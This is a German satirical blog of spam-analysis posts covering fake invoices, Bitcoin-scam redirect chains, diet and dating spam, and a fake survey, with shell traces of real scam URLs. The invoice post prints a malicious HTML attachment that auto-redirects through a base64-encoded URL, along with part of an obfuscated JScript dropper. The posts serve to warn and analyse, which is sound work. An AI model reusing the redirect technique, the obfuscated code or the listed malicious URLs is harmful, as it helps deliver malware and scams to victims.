Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Schlagwortarchiv „Cloud“

Gönnen Sie sich zum ersten Mal eine gute Nachtruhe!

Sonntag, 12. März 2023

Da sagt ja schon der Betreff „Gute Nacht“ zu mir. Aber gleich sechs Mal an die selbe Mailadresse binnen zwanzig Minuten. So schade, dass dieser spammende Schlafexperte viel zu schnarchnasig ist, um mal die Dubletten aus seiner Datenbank zu entfernen. 😁️

Hier ist Nachmittag. Im Kopf des Spammers dunkelste Nacht. 🌛️

Image

Ah ja! Ein Bild. 🖼️

OJE! ES SIEHT SO AUS, ALS WÜRDE IHR DERILA-WARENKORB BALD VERFALLEN!

Oh je, der Warenkorb ist ganz rostig und fällt gleich auseinander! Da muss man jetzt aber schnell kaufen. 🏃‍♂️️

Image
BESTELLUNG ABSCHLIESSEN

Wer halbwegs sicher konfigurierte Mailsoftware hat und keine Bilder aus dem Web nachlädt, sieht hier nix. Wer dann in den Quelltext der HTML-formatierten Mail schaut, darf sich durch Bullshit-CSS und trotzdem dreifach ineinander verschachtelte Tabellen lesen. Der URL des Bildes führt übrigens in die Cloud des dicksten und dienstbarsten Freundes der Kriminellen, also zu Google. Der Link ist nicht direkt gesetzt, sondern geht zu einem wohlbekannten Tracker, also zu einer Website, die überwacht, wer die Links geklickt hat. Wer darauf klickt, teilt den Spammern mit, dass die Spam ankommt, gelesen wird und sogar beklickt wird. Das bringt „Leben“ in den Posteingang. 🚾️

Deshalb klickt man ja auch nicht in E-Mail. 🖱️🚫️

Wir möchten nicht, dass Sie unser Sonderpreisangebot verpassen. Wir wollen auch nicht, dass Sie jede Nacht auf einen fantastischen Schlaf verzichten müssen!

Das ist ja mal was Neues: Ein „Sonderpreisangebot“. 😆️

Wir haben Derila entwickelt, weil wir wollten, dass unsere Kunden ein Kissen haben, das ihren Nacken und Rücken die ganze Nacht lang stützt, ohne Kompromisse beim Komfort einzugehen. Der hochwertige Memory-Schaum und das ergonomische Design helfen, Ihren Körper auszurichten, damit Sie besser schlafen können. Und es eignet sich für jede Schlafposition!

Oh, wie nett von euch! Das muss ja so ein richtiges Erfolgskissen sein, wenn es nur mit illegaler und asozialer Spam weggeht. 💩️

Die Erfahrungen von Kunden sind da eher etwas durchwachsen [Archivversion]. Beim Überfliegen sollte man bedenken, dass hier vermutlich auch eine Menge Spambewertungen abgegeben wurden, es werden ja auch flutartig Spammails versendet. Hier ein Erfahrungsbericht eines Kunden, der sich genau so liest, wie ich es bei einem Produkt erwarte, das mit illegaler und asozialer (und zudem sehr sehr dummer) Spam vermarktet wird:

Habe vor 4 Tagen storniert -- Habe vor 4 Tagen storniert, umgehend nach Bestellung. Ca 10min später. Bis heute keine Rückmeldung über die Bestätigung erhalten -- Lediglich täglich Werbung und die Information das Paket ist unterwegs. -- Werde die Annahme verweigern!!! -- Hoffe die Geld Erstattung geht schnell. -- Datum der Erfahrung: 04. März 2023

Keine weiteren Fragen. Und das ist nur einer der nicht so hübsch formulierten Erfahrungsberichte. Hier ist noch einer davon:

Viel zu viel Werbung!!! -- Viel zu viel Werbung!!! Das Kissen ist viel zu flach und stützt überhaupt nicht! Am nervigsten ist aber die Werbung! Ständig wird man angerufen und ständig bekommt man nervige E-mails! Bestellt bitte nichts! Wie kann ich diese nervigen Anrufe blockieren? Die Rufen jedesmal mit einer anderen Nummer an! -- Datum der Erfahrung: 06. März 2023

Auch das entspricht vollständig der Erwartung, die ich an einen Spammer habe. Aber es soll sich bitte niemand davon abhalten lassen, eigene Erfahrungen zu machen, ihr seid alle miteinander freie Menschen. Und zur Freiheit gehört auch ein Recht auf Dummheit. Nein, das gefällt mir auch nicht, es ist aber so. 😉️

Wer noch ein paar aktive Synapsen hat, kauft nicht bei Spammern. 🧠️✅️

Lassen Sie sich das nicht entgehen, gammelfleisch! Beeilen Sie sich und gehen Sie jetzt in den Warenkorb
RABATT ERHALTEN

Was, ich soll mich in den rostigen Warenkorb setzen? 🤡️

Aber nett, dass ihr so deutlich sagt, dass man als naiver, leicht zu übertölpender Spamempfänger kein Kunde, sondern eher so eine Art Ware ist. 😁️

Derila

{{campaign.address}}

+1 862 329-■■■■

https://derila.com

Oh, ihr versteht nicht einmal euer eigenes Spamskript, so dass da eine Textersetzung nicht funktioniert. Na, hauptsache mit Kissen kennt ihr euch aus! 😅️

This email was sent to {{contact.email}} because your‘ve subscribed on our site or made a purchase.

Garantiert nicht. Diese E-Mail ist eine Spam. 😠️

Unsubscribe

Ihr mich auch! 👅️

Glückliche Chance, einen KOSTENLOSEN Nespresso zu erhalten

Freitag, 10. März 2023

So so, eine glückliche Chance. Allerdings würde ich irgendwelche Dinge von Nestlé noch nicht einmal haben wollen, wenn ich Geld dazubekäme. Aus Gründen. 🤢️

Aber diese Mail kommt nicht von Nestlé. Sie kommt von richtigen Kriminellen. 💩️

Natürlich sieht man auch diese Spam nur in ihrer vollen Pracht…

In die Spam eingebettetes Bild mit dem ALT-Text "Ihre Chance, einen KOSTENLOSEN Nespresso zu erhalten" -- Antworten & Gewinnen -- Wir möchten Ihnen die einmalige Gelegenheit bieten, einen zu bekommen nagelneue Silvercrest Espressomaschine. -- Wir freuen uns, Ihnen die einmalige Gelegenheit anbieten zu können, ein brandneues Exemplar zu erwerben Silvercrest Espressomaschine erhalten! Um einen Anspruch geltend zu machen, Füllen Sie einfach diese kurze Umfrage über ihre Erfahrungen mit uns aus. -- [Vollständige Umfrage] -- Wenn sie sich abmelden möchten, klicken Sie bitte hier:

In order to unsubscribe from this mailing list, please click here or send post-mail to 3028 S Grand Blvd. # 285, Spokane, WA 99203

…wenn man unsicher konfigurierte Mailsoftware verwendet, die auch Bilder aus dem Web nachlädt. Das eine Bild wurde bei Twitter [bewusst nicht von mir verlinkt] hochgeladen, wo sich offenbar seit Wochen niemand mehr um gemeldete Spam kümmert, das andere Bild wurde bei Imgur hochgeladen. Beides natürlich ziemlich anonym, völlig kostenlos und dienstmissbräuchlich. Weil diese Spammer eben so richtig asozial sind. Der Link führt übrigens in die mutmaßlich ebenfalls kostenlos und anonym genutzte Google-Cloud, wo man sich dann selbst ganz schnell – das Angebot läuft ja angeblich tick-tack in 3:42 Minuten aus – zu einer noch weniger empfehlenswerten Website weiterklicken muss:

$ lynx -dump -source "https://firebasestorage.googleapis.com/v0/b/yatoo-llc.appspot.com/o/DE%20-%20Silvercrest%20Espresso%20Lidl%20Lander.html?alt=media&token=405b06f7-409b-4a79-8492-2fe93565da05"
<center>
<a href="https://inboxhous.page.link/mKfG"><font style="color:red;font-family:Nunito;font-style: italic"size="6">Begrenztes Angebot – läuft in 03:42 Minuten ab!
</font><br/>
<img src="https://pbs.twimg.com/media/FoqYTLrXEAAbGw3?format=jpg&name=4096×4096" width="700" border="0">
<br/><br/><br/>
<br/>
<a href="https://inboxhous.page.link/mKfG"><img src="https://i.imgur.com/ZR5eERN.png"/></a>
<center>
$ surbl inboxhous.page.link
inboxhous.page.link	LISTED: ABUSE
$ _

So so, eine „einmalige Chance“ soll das also sein. Die habe ich jetzt aber schon zum zweiten Mal. Und in den vergangenen 27 Tagen wurden nicht einmal die peinlichsten Fehler in diesem Bild korrigiert. Vermutlich halten die Spammer Menschen, die solche Fehler…

Wir möchten Ihnen die einmalige Gelegenheit bieten, einen zu bekommen nagelneue Silvercrest Espressomaschine […] Wir freuen uns, Ihnen die einmalige Gelegenheit anbieten zu können, ein brandneues Exemplar zu erwerben Silvercrest Espressomaschine erhalten!

…noch bemerken können, bereits für zu intelligent, um auf so einen plumpen Trick der Marke „Mach dich mal für uns datennackt und glaub, dass wir dir dafür etwas schenken“ reinfallen zu können. 😅️

Alle Daten, die man dort eingibt, gehen direkt an spammende Kriminelle. Ob diese Daten – wie in früheren Versionen des Umfrage- und Gewinnspielbetruges – einfach nur verkauft werden, oder ob sie nach Möglichkeit mit anderen Daten zusammmengeführt werden und für einen kriminellen Identitätsmissbrauch verwendet werden, weiß ich natürlich nicht. Aber eines weiß ich: Mit einer Spam kommt niemals etwas Gutes. Sonst wäre es ja auch keine illegale und asoziale Spam.

Ohne Betreff

Donnerstag, 2. Februar 2023

Heute habe ich es zum ersten Mal geschafft, eine derartige Spam…

https://1drv.ms/w/s!AnDdU2-UFXyEgR38iQlfCMh1z6PR

…rechtzeitig wahrzunehmen, also noch bevor Microsoft den verlinkten Inhalt aus seinem „Cloud“-Dienst gelöscht hat. Und das heißt, dass ich endlich mal sagen kann, was in diesen kryptischen Spams ohne Betreff, aber mit Link in Microsofts „Cloud“, so drinsteht. 💡️

$ mime-header 'https://1drv.ms/w/s!AnDdU2-UFXyEgR38iQlfCMh1z6PR'
HTTP/1.1 301 Moved Permanently
Location: https://onedrive.live.com/redir?resid=847C15946F53DD70!157&authkey=!APyJCV8IyHXPo9E&ithint=file%2cdocx
X-MSNSERVER: DB3PPF6CC9BCC04
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: +EIJlvS8cUG3sv2fucBgyA.0
X-AsmVersion: UNKNOWN; 19.1074.105.2010
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: C5916954D1E94930BFB4E53CF1D45EAC Ref B: DUS30EDGE0919 Ref C: 2023-02-02T12:01:17Z
Date: Thu, 02 Feb 2023 12:01:17 GMT
Connection: close
Content-Length: 0
$ _

Leider ist es nicht leicht möglich, diese Datei an der Kommandozeile herunterzuladen, weil die „Cloud“-Anfixer und digitalen Gutsherren von Microsoft einen großen Haufen Javascript gelegt haben, um einfache und direkte technische Möglichkeiten zu verhindern und die Benutzung eines voll aufgeplusterten Webbrowsers zu erzwingen. Na gut, dann eben über die virtuelle Maschine, die ich für solche Momente vorhalte (und auf der sich Kriminelle gern austoben dürfen). 🧸️

Was man dort herunterladen kann, ist ein Dokument für Microsoft Word…

$ file invite-jCB5MMu0I.docx 
invite-jCB5MMu0I.docx: Microsoft Word 2007+
$ _

…das auch aussieht, und zwar so:

Bitcoin -- Das ist ihre persönliche Einladung! -- Ihre Freunde und Bekannten nutzen das System bereits! Verpassen sie auch nicht ihre Chance! -- Einzelheiten [Link]

Krass, ein „Click here“ in der Spam, der auf einen in proprietärer Software verbuddelten „Click here“ in der Cloud führt, und meine Freunde und Bekannten waren so doof, dass sie darauf rumgeklickt haben. Mit denen muss ich aber mal ein sehr ernstes Wort sprechen… 🤭️

Natürlich ist nicht einmal dieser indirekte Link in einem Cloud-Dokument direkt gesetzt. Hier wird noch einmal über Bitly und daran anschließend noch einige Weiterleitungen maskiert, wo die Reise hingehen soll. 🎭️

$ location-cascade https://bit.ly/3WLriKQ
     1	https://z3xvg.app.link/sF1RXMkWYwb
     2	http://ucuiwwa.contractproduction.co.in/23525662423763622?_branch_match_id=1149668583144555590&utm_medium=marketing&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXrzKuKEvXSywo0MvJzMvWL3YzDIrwzQ6PLE8CAFnhhGEiAAAA
     3	http://de.personorganisation.co.in/tr/vip/DE/7011/?bet=28368923&affsub2=hot
$ _

Damit ist das Versteckspiel noch lange nicht am Ende. Die Website, bei der man schließlich ankommt, zieht es vor…

$ lynx -dump http://de.personorganisation.co.in/
                                403 Forbidden
     __________________________________________________________________

                                nginx/1.10.3
$ _

…gar keine Startseite zu haben. Man muss schon die ganze URL mit Parametern und Affiliate-ID des Spammers verwenden, um schließlich…

$ lynx -dump "http://de.personorganisation.co.in/tr/vip/DE/7011/?bet=28368923&affsub2=hot" | sed 8q
   Bitcoin Code

   Reite auf der Erfolgswelle des Bitcoins und du kannst bis zu €13.000 in
   den nächsten 24h verdienen

   Lass mich dir jetzt

live zeigen wie man sich Cash verdient!
$ _

…auf der altbekannten Betrugsseite „Bitcoin Code“ zu landen, die ihren Bullshit seit 2017 im Wesentlichen unverändert präsentiert. Die paar Darstellungsfehler, die offenbar bei etwas zu hastigen Umzügen auf neue Server entstanden, sind mir keinen neuen Screenshot wert. Wichtigster Inhalt neben traumhaft schönen Bildern vom Reichtum ist das Video des spammigen Reichwerdexperten Sven Hegel, ebenfalls seit Jahren unverändert. 🥱️

Warum sollte man daran auch etwas verändern. Es läuft ja schon seit Jahren, und eine Neugestaltung der Betrugsnummer wäre doch mühsam. Wenn die Spammer sich Mühe geben wollten, könnten sie ja gleich arbeiten gehen! 🛠️

Offenbar finden sich immer noch genug „ungebrannte Kinder“, denen man erzählen kann, dass sich jeder dahergelaufene Honk klicki-klicki das Geld aus der Steckdose ziehen kann. Das ist natürlich nicht wahr. Tatsächlich ist es ein Betrug. Das Geld, das man da reinsteckt, ist weg. Und die tollen Zahlen, die einem in der App angezeigt werden, sind nur Zahlen. Der persönliche Berater allerdings, der irgendwann anruft und empfiehlt, weil es gerade so gut läuft, noch mehr Geld hinterherzuschmeißen, der ist echt. Er ist ein gewerbsmäßiger Betrüger. Am Ende wird er noch eine sehr gesalzene Gebühr nehmen, wenn man sein angezeigtes Geld auch abholen will, und dann bricht der Kontakt einfach ab. Viele merken erst in diesem Moment, dass sie betrogen wurden und dass das Geld jetzt weg ist. 💸️

Bitte nicht auf solche Reichwerdexperten aus der Spam reinfallen! Man kann mit Geld etwas Besseres anfangen, als solchen asozialen Verbrechern den verfeinerten Lebensstil zu finanzieren. Ich nehme mal an, dass hier jedem etwas einfällt… 😉️

Ohne Betreff

Sonntag, 29. Januar 2023

Aber dafür gleich drei Mails innerhalb von nur zwei Minuten. Woher soll so ein Spammer auch wissen, wie man mit sort und uniq die Dubletten aus seinem zusammenkopierten Adressbestand rausholt? Dieser ganze Technikkram hirnt doch immer so. Der will Computer doch nur zum Spammen verwenden und nicht auch noch etwas lernen. Wenn ein Spammer sich Mühe geben wollte, könnte er doch gleich arbeiten gehen… 🛠️

Von: Nicky <jruiz@schradercamargo.com>
An: gammelfleisch@tamagothi.de
Betreff: ohne Betreff

https://1drv.ms/w/s!AjrY7OCtvYOcdqIncguobfBJAPI

Ja, das ist die ganze Spam. 🙃️

Ich weiß leider nicht, was die angebliche Nicky hier angeboten hat, weil Microsoft schon so nett war, den Müll von seinem Cloud-Angebot zu entfernen, aber ich bin mir ziemlich sicher, dass es nichts Gesundes gewesen sein wird. Vermutlich war es eine aktuelle Kollektion von Schadsoftware. 💀️

Aber wieso jemand in solche E-Mails vor irgendwelchen Unbekannts klicken sollte, weil da ein Link drin ist, auf den man ja klicken kann, entzieht sich völlig meinem Verständnis. 🖱️🚫️

Und nein: Die befriedigte Neugierde ist das Risiko nicht wert! 😉️

『Das Ende der Ära des Übergewichts!』

Mittwoch, 28. Dezember 2022

Häh, was macht ihr denn für lustige Zeichen in den Betreff? Glaubt ihr etwa, dass eure Quacksalber-Spam damit besser aussieht? 🤭️

Von: 𝓚𝓾𝓷𝓭𝓮𝓷𝓭𝓲𝓮𝓷𝓼𝓽 <0DYIOLLR48K9IVYGOGPD@googlegroups.com>
An: [to]

Ja, ihr scheint da einen ganz komischen Glauben zu haben. Normale Menschen verwenden ja die ganz normalen alphabetischen Zeichen in Unicode, die man direkt auf der Tastatur tippen kann, mit denen jede Software klarkommt und die man sich sogar vom Computer vorlesen lassen kann. Aber nein, das hier sind Spammer. Die haben weder Klarheit noch Vernunft auf der Prioritätenliste stehen, denen gehts nur um den Verkauf ihrer (im besten Fall) völlig wirkungslosen Gesundheitsprodukte an leichtgläubige Menschen. Und so sieht es dann auch immer aus. 😁️

14kg in einem Monat!

Die Höhle der Löwen -- Verlieren Sie bis zu 14 kg in einem Monat? -- Dazu müssen Sie nur diese neue revolutionäre Methode ausprobieren, die das Fett automatisch verbrennt, und schon nach wenigen Wochen bekommen Sie eine schlanke und attraktive Figur. -- Nehmen Sie ab und erhalten Sie dieses Jahr diese schlanke Figur -- Jetzt zum Angebot

JETZT ZUM ANGEBOT! >>

Hören diese Spams eigentlich niemals auf? 😩️

  1. Das Bild hosten die Spammer nicht selbst. Es wurde anonym und kostenlos in der Google-Cloud abgelegt. Die Spammer bieten ihre „revolutionäre“ Methode nicht über eine Website an, sondern über Spam und Spam und Spam, und deshalb können sie das Bild nicht selbst hosten.
  2. Im Bild sieht man das Logo von „Die Höhle der Löwen“. Die Sendung, in der dieses Produkt vorgestellt wurde, hat es niemals gegeben. Inzwischen schreiben Spammer nicht mehr „die Höhle der Löwen“ in den Text, sondern verwenden es nur noch in Bildern. Vermutlich bin ich nicht der einzige Mensch gewesen, der gemerkt hat, dass dieser Text beinahe nur noch in Spam vorkommt, so dass ich diese Fluten mit einer ganz einfachen Regel zum Nullgerät senden kann. Dass die Marke „Höhle der Löwen“ von Spammern nachhaltig beschädigt wurde, ist den Spammern egal. Denen ist alles egal, solange ihr eigenes Geschäft läuft. Die sind asozial und kriminell.
  3. Um abzunehmen, muss man nicht mehr in sich hineinkippen, sondern weniger. Um ein Kilogramm Fett abzubauen, muss man rd. 9.000 Kilokalorien weniger lecker Energie in den Mund stecken, als man verbraucht. Das ist mit einem starken Unlustgefühl verbunden. Der Volksmund spricht vom „Hunger“. Aber eine andere Methode gibt es nicht. Der Bauch ist keine physikfreie Zone. Wer mir das nicht glauben möchte, weil ich nur ein dahergelaufener Blogger bin, frage bitte einfach einen richtigen Arzt! Aber auf keinen Fall auf solche Betrüger reinfallen! Im Februar habe ich mich noch etwas ausführlicher ausgelassen.
  4. Um 14 Kilogramm Fett innerhalb eines Monats abzubauen, müsste man während dieses Monats jeden Tag rd. 4.200 Kilokalorien mehr verbrauchen als man über das Essen aufnimmt (Wer mir nicht glaubt, greife bitte zum Taschenrechner!). Um in die Nähe eines solchen Energieumsatzes zu kommen, muss man schon Leistungssportler oder Schwerarbeiter sein. Dazu dann auch eine Mangelernährung zu machen, überlebt man keinen Monat lang.
  5. Noch schneller verbrennt man das Fett, wenn man sich mit Benzin übergießt und anzündet. Das Wort „Fettverbrennung“, das einen mühelos von allein ablaufenden Vorgang suggeriert, findet sich nur in den Spams und in der Reklame von Quacksalbern.
  6. Ein funktionierendes Gehirn, das sich nicht jeden Betrug andrehen lässt, ist viel wichtiger als ein attraktives Aussehen und eine schlanke Figur. Selbst, wenn es überhaupt keine Kenntnisse hat (wer weiß schon die Energiedichte von Fett), sieht ein funktionierendes Gehirn beim Anblick einer derartigen Spam sofort, dass es alles Lüge sein muss. Warum? Weil dem funktionierenden Gehirn klar wird, dass ein derartiges Medikament, wenn es wirklich wie angepriesen wirkte, nicht über illegale und asoziale Spam vermarktet werden müsste. Fettleibigkeit ist nämlich eine Volkskrankheit. Ein wirksames Medikament wäre ein Bombengeschäft. Es wäre bei seiner Markteinführung ein Thema in sämtlichen Massenmedien, die ersten unglaublichen Erfolgsgeschichten wären ein Thema in sämtlichen Massenmedien, und es würde sich wie von selbst verkaufen. Aber trotzdem hinge überall die Reklame dafür. Auch, wenn man geistig so entlegen lebt wie ich (kein Fernsehen, wirksamer Werbeblocker im Web, kein Rundfunk, Presseprodukte nur über Umwege, denn ich hänge sehr an meiner geistigen Gesundheit in schwierigen Zeiten), würde man in Gesprächen davon erzählt bekommen. Und zwar begeistert. Weil es wirkt. Weil es ein Problem löst, das viele Menschen über Jahre hinweg oder gar ihr ganzes Leben lang haben und dank ihrer psychisch höchst ungesunden Konkurrenz zu den Photoshopmonstern der Werber und PR-Leute noch mehr Menschen zu haben glauben. Wir haben es nicht gehört? Obwohl es in der „Höhle der Löwen“ gelaufen sein soll? Na, wie kommt das wohl… 😉️
  7. Gegen zwei sehr schlimme, ziemlich teure und das ganze Leben vernichtende Leiden haben die Quacksalber aus der Spam niemals ein Mittel: Gegen Leichtgläubigkeit und gegen Hirnträgheit.

Also bitte nicht auf solche Spams reinfallen! 💡️

Sign in to 📊 GET 0.43 BTC – CLICK HERE

Sonntag, 27. November 2022

Oh, ich kriege BTC geschenkt. Grundlos. Weil meine Mailadresse so schön ist. Und „Click here“ steht sogar schon im Betreff! 🏆️

Wer in so eine Spam klickt, lasse alle Hoffnung fahren! 🔥️

Hello,

Genau mein Name! 👍️

We received a request to sign in to 📊 GET 0.43 BTC – CLICK HERE using this email address.

Was ist das denn für ein tolles Englisch? „Wir haben eine Anfrage erhalten, uns mit dieser Mailadresse bei ‚Erhalten Sie 0,43 BTC, klick mal auf klick mal‘ anzumelden“? (Das ist schon geglättet übersetzt.) Von mir habt ihr die „Anfrage“ jedenfalls nicht. Ich verwende Bitcoin nicht. Ich will auch nicht. Aus Umweltschutzgründen¹. 🌍️

If you want to sign in with your sag@ich.net² account, click this link:

Sign in to 📊 GET 0.43 BTC – CLICK HERE

Die verlinkte Web-Adresse ist nicht nur ein bisschen kryptisch, sondern auch ein bisschen lang. Sie besteht aus insgesamt 590 Zeichen. Die Domain, in welche dieser Link führt…

$ host hwvkar0cqi.page.link
hwvkar0cqi.page.link has address 142.250.185.129
hwvkar0cqi.page.link has IPv6 address 2a00:1450:4001:810::2001
$ whois 142.250.185.129 | grep -i ^org | sed 5q
Organization:   Google LLC (GOGL)
OrgName:        Google LLC
OrgId:          GOGL
OrgTechHandle: ZG39-ARIN
OrgTechName:   Google LLC
$ _

…wird beim dicksten Freund und Komplizen des Spammers und Betrügers, bei Google, gehostet. Vermutlich in der „Cloud“, die ja jetzt hipp, modern, zukunft und digital ist und uns jeden Tag ganz viele first world problems zu lösen verspricht, die ich noch nie als Probleme empfunden habe. (Schon gar nicht, seit Datenträger billig und leicht transportierbar geworden sind.) Aber nach regelmäßigem Datengenuss an einem so genannten smart phone scheint sich das Gehirn neu zu verdrahten und dann fängt man langsam an, ganz anders zu „denken“ und sich dabei auch noch für ganz schlau zu halten… ich sehe es ja auch jeden verdammten Tag im Straßenverkehr. 😁️

Auf eine Abuse-Meldung habe ich bei Google schon lange keine Lust mehr. Ich stehe nicht so auf Kafka-Erfahrungen. Die wollen nichts gegen Spam tun, sondern vielmehr die Kosten ihrer gratis angebotenen Dienstleistungen der ganzen Welt aufbürden, aber den Reibach für sich behalten. Google ist schon längst selbst zur Spam geworden. ☹️

If you did not request this link, you can safely ignore this email.

Ach, das ist aber nett! 🤭️

Thanks,

Danke für den pseudohöflichen Dank für nichts! Du mich auch! 🖕️

Your 📊 GET 0.43 BTC – CLICK HERE team

Was für ein tolles Team! 😂️

Entf! 🗑️

¹Ja, wirklich. Der Energieverbrauch für jede einzelne Bitcoin-Transaktion ist so absurd hoch, dass ich die Verwendung von Bitcoin für unverantwortbar halte. Und das wird mit zunehmender Nutzung nicht etwa besser, sondern nur schlimmer.

²Mailadresse geändert.

I liked it so much… I want more

Freitag, 4. November 2022

These girls want to find a guy

Pornografisches Foto einer Frau, die Arsch und Möse präsentiert -- hier mit der 'Frucht des Jugendschutzes' unbrauchbar gemacht.

< 1 / 5 >
Open her profile Cheraghearzu 10 miles from you

So so, dieses keck präsentierte Möslein¹ ist also nur zehn Meilen von mir entfernt? Was für Meilen sind es denn? Seemeilen, englische Meilen, sächsische Landvermessermeilen, metrische skandinavische Meilen oder deutsche Landmeilen? Nicht, dass das einen großen Unterschied machte, denn der Abstand zu mir ist allemal groß genug. Obwohl: Zehn Lichtjahre wären noch besser. 😉️

Die Links in der Spam führen übrigens alle in die Google-Cloud², denn das kostet den Spammer ja kein Geld. Dort ist ein PDF abgelegt, das in seiner gar nicht zur drastisch-deutlichen Mail passenden Unschärfe wohl sicher durch die automatischen Pornofilter bei Google kommt. Das PDF hat nur eine Seite, und die sieht so aus:

I am 18 years old -- [Join]

Was, Dating? Mit einer Spammerin? Och nö! 🤭️

Was von irgendwelchen Dating-Websites zu halten ist, auf denen es nur Frauen gibt, sollte eigentlich jedem Menschen mit Gehirn klar sein: Es ist Betrug. Die Frauen existieren nicht. Man hat es die ganze Zeit mit Bots oder mit Animateuren zu tun, die oft zwei Dutzend Leute gleichzeitig bespaßen. Das Geld, mit dem man die gesalzenen Preise bezahlt, geht an Kriminelle. Persönliche Daten, die man angibt (mit sexuellen Interessen, lecker!) werden an andere Kriminelle verkauft. Interessierte Frauen sind Trickbetrügerinnen, die einem noch mehr Geld aus der Tasche ziehen. Ich will es mal so sagen: Das Bordell ist preiswerter, und da gibt es etwas für das Geld. 💸️

Wer mir das nicht glaubt, kann sich ja mal fragen, was diese Frauen eigentlich immer machen, dass es dort keine Männer gibt… 🙃️

Die lustige „Frucht des Jugendschutzes“ im Foto aus der Spam ist natürlich von mir eingefügt, im pornografischen Originalbild hat nichts den Blick auf die Vulva verstellt.

²Ich habe den Missbrauch bei Google gemeldet und bin mal gespannt, ob Google inzwischen mehr Interesse an der Bekämpfung von Spam und Internetkriminalität hat. Kostenlose Cloud-Angebote als Hilfsmittel der Spammer werden in den nächsten Jahren eine Pest.

Ihre Rechnung 146648577349 von der Böttcher AG

Freitag, 30. September 2022

⚠️ Warnung, Schadsoftware! Auf gar keinen Fall den Anhang klicken! ⚠️

Von: Böttcher AG <no-reply@glenat.com>
An: undisclosed-recipients: ;

So so, eine Rechnung, die an ganz viele Empfänger auf einmal geht. 😂️

Natürlich kommt diese Spam nicht von der Böttcher AG, sondern von schwerkriminellen Spammern, die Rechner anderer Leute mit Schadsoftware übernehmen wollen. Bevorzugt kleine und mittelständische Unternehmen. Denen droht dann oft die Insolvenz, und dann werden Erpresser halt bezahlt. 😕️

Ihre Rechnungsnummer: 146648577349
Ihre Kundennummer: 646756981732962

Lieber Kunde,

Hach, so viele schöne Zahlen, aber der einzige Name, den ich habe, ist „Lieber Kunde“. Die scheinen ihre Kunden aber nicht zu mögen. 😁️

beiliegend erhalten Sie Ihre Rechnung als HTML-Dokument.

Ah ja! Da ist ja tatsächlich ein Anhang dran. Da steht aber nicht so viel drin. Der ist nur eine Weiterleitung zu einer base64-codierten URL. Na gut, fange ich mal an – wie üblich arbeite ich mit meiner Kommadozeile unter Linux:

$ cat Rechnung-b-a_0000003198.html 
<body id="kqisC2MKfeohSuvlhlQyUmZZdlUGTxyDYNrBPoW05qdsUurHk2yYsHp4DgvqGBSbC5Aut1qSVdJDugOkeNeshVsoPBGnbKJ3UCLXYnFs4Bu" onpageshow="document.location.href=window.atob('aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M=');">
$ echo aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M= | base64 -d; echo 
https://3t8.at/apD8qloS
$ mime-header https://3t8.at/apD8qloS | grep -i ^location
location: https://info-opensocial.googleusercontent.com/gadgets/ifr?url=https://hatcherlawgroup.com/img/inf/inf
$ _

Ab jetzt geht es nur noch mit einem richtigen Browser weiter, weil zum Zugriff auf die gängelnde und gefährliche Google-Cloud leider Javascript benötigt wird. Ja, dieser hochgefährliche Sondermüll wird anonym und kostenlos in der Cloud eines Google-Kontos gehostet. Ist es nicht „schön“, wie einfach das alles geworden ist? Hier ist längst ein Paradies für Kriminelle entstanden. Ich habe mir mal den Spaß gemacht und in einer virtuellen Maschine den Download gemacht. Die Datei ist ein ZIP-Archiv, das es in sich hat:

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 96K Sep 30 15:21 5640955135.zip
$ zip -sf 5640955135.zip 
Archive contains:
  xi1132111.js
Total 1 entries (418953 bytes)
$ unzip 5640955135.zip 
Archive:  5640955135.zip
  inflating: xi1132111.js  
$ _

Dettelbach ist überall! 😱️

Diese Datei ist kein Dokument, sondern Programmcode, der nach klicki-klicki Doppelklick vom Windows Script Host ausgeführt wird. Dieser Programmcode ist ausgesprochen kryptisch formuliert und…

$ wc xi1132111.js 
     2    373 418953 xi1132111.js
$ _

…steht in lediglich zwei Zeilen, die aber insgesamt rd. 420 Kilobyte Javascript-Programmcode enthalten. 😮️

Um einen Eindruck davon zu vermitteln, wie vorsätzlich schwierig analyisierbar und kryptisch dieses Programm gecodet ist, gebe ich hier mal das erste Kilobyte aus und füge nach jedem Komma einen Zeilenumbruch ein, damit man es noch bequem lesen kann:

$ dd status=none if=xi1132111.js bs=1024 count=1 | sed 's/,/,\n/g'; echo 
function _0×3cd5(){var _0×11cf11=['\x2f\x67\x2c\x66\x5b\x31\x46\x5d\x29\x29\x3b\x31\x67\x3d',
'\x6a\x70\x66\x57\x51',
'\x79\x5c\x5a\x22\x2c\x22\x5c\x6a\x5c\x6d\x22\x2c\x22\x5c',
'\x56\x6b\x72\x7a\x62',
'\x5c\x6b\x22\x2c\x22\x5c\x74\x5c\x31\x62\x22\x2c\x22\x5c',
'\x4f\x6f\x4d\x6c\x57',
'\x4d\x41\x58\x41\x73',
'\x5c\x63\x5c\x68\x5c\x73\x5c\x63\x5c\x59\x5c\x63\x5c\x63',
'\x75\x5d\x2b\x66\x5b\x31\x76\x5d\x2b\x66\x5b\x31\x6d\x5d',
'\x61\x5c\x62\x5c\x62\x5c\x61\x5c\x62\x5c\x53\x5c\x4a\x5c',
'\x6a\x61\x61\x67\x70',
'\x7c\x7a\x6d\x42\x45\x6f\x52\x53\x64\x7c\x78\x34\x42\x7c',
'\x61\x77\x6e\x6c\x69',
'\x49\x65\x52\x45\x67',
'\x5c\x73\x5c\x63\x5c\x43\x5c\x63\x5c\x70\x5c\x61\x5c\x69',
'\x72\x4d\x79\x54\x48',
'\x49\x6d\x77\x47\x67',
'\x42\x69\x74\x77\x49',
'\x5c\x75\x5c\x6e\x5c\x6d\x5c\x72\x5c\x61\x5c\x64\x5c\x6b',
'\x77\x7a\x77\x47\x71',
'\x61\x5c\x62\x22\x2c\x22\x5c\x65\x5c\x61\x5c\x62\x5c\x64',
'\x5c\x6b\x22\x2c\x22\x5c\x6a\x5c\x55\x5c\x70\x5c\x61\x5c',
'\x5c\x2b\x5c\x2b\x20\x2a\x28\x3f\x3a\x5b\x61\x2d\x7a\x41',
'\x5c\x6f\x5c\x78\x5c\x63\x5c
$ _

